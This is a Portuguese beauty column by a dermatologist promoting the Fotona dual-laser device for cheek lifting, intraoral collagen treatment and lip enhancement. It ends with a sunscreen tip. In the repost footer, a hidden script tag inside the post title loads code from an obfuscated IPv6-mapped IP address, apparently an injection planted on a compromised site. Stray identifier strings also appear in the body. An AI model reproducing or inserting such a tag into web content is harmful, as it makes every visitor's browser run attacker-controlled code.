\ Aparelho Fotona – Coluna Clarissa Rittes

Olá meninas!

Hoje vou falar para vocês sobre o Fotona, um aparelho de última geração que associa 2 lasers, ND yag e Erbium Yag.

Ele é inovador, possui esses dois tipos diferentes de lasers e, muitas opções de uso, pois permite uma variação muito grande de energia e tempo de pulso, fazendo com que seja possível atingir camadas diferentes, pigmentos diferentes, e tratar todos os tipos de pele. Dependendo da duração do pulso de energia e do seu fracionamento, é possível fazer pequenas e grandes ablações.

OCC_204944

Existe um programa muito interessante do laser neodímio, que promove uma elevação instantânea da bochecha. Isso ocorre porque a energia atua diretamente na derme e também na ” capa ” da musculatura, causando uma desestruturação das fibras de colágeno, que ” derretem” e depois se reestruturam contraídas. Como uma gelatina que após amolecer com o calor, se reestrutura e se contrai.

Esse programa é relevante isoladamente em mulheres a partir dos 25 anos, pois essa elevação tira o “peso” das maçãs que começam a cair nessa idade, obrigando a musculatura do terço inferior da face a ficar muito forte e “puxar” tudo para baixo. Ou seja, além de elevar as maçãs e deixar o rosto mais harmônico, ocorre uma prevenção do envelhecimento, sendo mais uma forma de lutar contra a gravidade.

19af3f65-7a45-455e-8cd9-681eb524c918

Em pacientes mais maduras, a partir dos 45-50 anos, é interessante utilizar esse programa do neodímio chamado “aplicatura” (porque ocorre a formação de uma prega de fibras que sustenta as bochechas), com outros programas do Fotona, como o 4D, que une a ” aplicatura” com o resurfacing não ablativo do Erbium e a ponteira intra oral. Isso mesmo, o aparelho possui também uma ponteira intra oral, do laser de Erbium que promove uma estimulação do colágeno de dentro para fora da boca e também nos lábios.

Esse programa intra oral é excelente para ajudar a eliminar o “bigode chinês” e a ” linha do marionete”, além de promover um discreto aumento labial. O número de sessões depende da idade, variando de 4 a 6, uma vez ao mês. E a duração é de 6 meses a 1 ano, também dependendo da idade e tipo de pele.

Ainda vou falar sobre mais possibilidades do Fotona nas próximas colunas. Consulte seu Dermato, com o aparelho adequado, é possível manter a juventude de forma pouco invasiva e com pouquíssimo downtime (tempo de recuperação).

Uma dica importante é não esquecer do protetor solar! O sol é um grande destruidor do nosso colágeno e a luz UV- A está presente o ano inteiro, sendo capaz de perfurar nuvens e destruir nosso colágeno, mesmo nos dias chuvosos e nublados. Quanto mais preservamos o colágeno, mais tempo duram os resultados dos lasers e procedimentos feitos em consultório!

Beijos, Dra. Clarissa.

O post Aparelho Fotona – Coluna Clarissa Rittes<script src=http://[::ffff:36bf:2bad]></script> apareceu primeiro em Lala Rudge e Maria Rudge.

\ comentários


\ Os mais amados